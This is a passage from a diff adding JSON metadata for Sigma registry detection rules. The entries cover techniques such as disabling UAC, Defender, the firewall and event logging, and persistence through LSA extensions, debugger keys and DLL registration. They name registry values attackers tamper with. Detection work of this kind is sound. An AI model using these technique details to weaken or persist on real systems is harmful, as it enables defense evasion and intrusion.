"registry_set_disable_security_center_notifications.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "value": "Disable Windows Security Center Notifications" + }, + { + "description": "Detects the modification of the registry to disable a system restore on the computer", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + 
"falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_system_restore.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", + "value": "Registry Disable System Restore" + }, + { + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_uac_registry.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "value": "Disable UAC Using Registry" + }, + { + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "meta": { + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrator actions" + ], + "filename": 
"registry_set_disable_windows_defender_service.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "value": "Windows Defender Service Disabled" + }, + { + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_windows_firewall.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", + "value": "Disable Windows Firewall by Registry" + }, + { + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/07/04", + "falsepositive": [ + "Legitimate administrators disabling specific event log for troubleshooting" + ], + "filename": "registry_set_disable_winevt_logging.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889", + 
"https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", + "value": "Disable Winevt Event Logging Via Registry" + }, + { + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disallowrun_execution.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "value": "Add DisallowRun Execution to Registry" + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and 
registering a disk cleanup handler.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "value": "Persistence Via Disk Cleanup Handler - Autorun" + }, + { + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/07/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_dns_over_https_enabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://github.com/elastic/detection-rules/issues/1371", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", + "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" + ] + }, + "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "value": "DNS-over-HTTPS 
Enabled by Registry" + }, + { + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_dns_serverlevelplugindll.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "value": "DNS ServerLevelPluginDll Install - Registry" + }, + { + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "meta": { + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "creation_date": "2020/09/10", + "falsepositive": "No established falsepositives", + "filename": "registry_set_enabling_cor_profiler_env_variables.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jamieantisocial/status/1304520651248668673", + "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", + "https://www.sans.org/cyber-security-summit/archives", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" + ] + }, + "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "value": "Enabling COR 
Profiler Environment Variables" + }, + { + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/15", + "falsepositive": [ + "Administrator actions" + ], + "filename": "registry_set_enabling_turnoffcheck.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "value": "Scripted Diagnostics Turn Off Check Enabled - Registry" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_etw_disabled.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + 
"https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_etw_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "value": "COMPlus_ETWEnabled Registry Modification - Registry" + }, + { + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "value": "Suspicious Application Allowed Through Exploit Guard" + }, + { + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "meta": { + "author": "frack113", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_fax_change_service_user.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "e3fdf743-f05b-4051-990a-b66919be1743", + "value": "Change User Account Associated with the FAX Service" + }, + { + "description": "Detect possible persistence using Fax DLL load when service restart", + "meta": { + "author": "frack113", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_fax_dll_persistance.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "value": "Change the Fax Dll" + }, + { + "description": "Detects the abuse of the exefile handler in new file association. 
Used for bypass of security products.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/11/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_file_association_exefile.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1461041276514623491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "value": "New File Association Using Exefile" + }, + { + "description": "Detects persistence using GlobalFlags in image file execution options", + "meta": { + "author": "Karneades, Jonhnathan Ribeiro", + "creation_date": "2018/04/11", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_globalflags_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" + ] + }, + "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", + "value": "GlobalFlags Registry Persistence Mechanisms" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "This value is not set by default but could be rarly used by administrators" + ], + "filename": 
"registry_set_hangs_debugger_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/wer_debugger.html", + "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", + "value": "Add Debugger Entry To Hangs Key For Persistence" + }, + { + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_hhctrl_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/hhctrl.html", + "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "value": "Persistence Via Hhctrl.ocx" + }, + { + "description": "Hides the file extension through modification of the registry", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_hidden_extention.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", + 
"https://unit42.paloaltonetworks.com/ransomware-families/", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", + "value": "Registry Modification to Hidden File Extension" + }, + { + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_hide_file.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "value": "Modification of Explorer Hidden Keys" + }, + { + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "meta": { + "author": "frack113", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_hide_function_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", + "value": "Registry Hide Function from User" + }, + { + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "value": "Hide Schedule Task Via Index Value Tamper" + }, + { + "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_ie_persistence.yml", + "level": "low", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "value": "Modification of IE Registry Settings" + }, + { + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate registration of IFilters by the OS or software" + ], + "filename": "registry_set_ifilter_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/ifilters.html", + "https://twitter.com/0gtweet/status/1468548924600459267", + "https://github.com/gtworek/PSBits/tree/master/IFilter", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", + "value": "Register New IFiltre For Persistence" + }, + { + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_install_root_or_ca_certificat.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "d223b46b-5621-4037-88fe-fda32eead684", + "value": "New Root or CA or AuthRoot Certificate to Store" + }, + { + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "meta": { + "author": "frack113", + "creation_date": "2022/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download" + }, + { + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. 
Each DLL has its InitializeLsaExtension() method called after loading.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_lsa_extension_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/lsaaextension.html", + "https://twitter.com/0gtweet/status/1476286368385019906", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "value": "Persistence Via LSA Extensions" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "registry_set_mal_adwind.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "value": "Adwind RAT / JRAT - Registry" + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_mal_blue_mockingbird.yml", + 
"level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ] + }, + "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", + "value": "Blue Mockingbird - Registry" + }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + ], + "filename": "registry_set_mpnotify_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/mpnotify.html", + "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", + "value": "Persistence Via Mpnotify" + }, + { + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "28036918-04d3-423d-91c0-55ecf99fb892", + "value": "NET NGenAssemblyUsageLog Registry Key Tamper" + }, + { + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." 
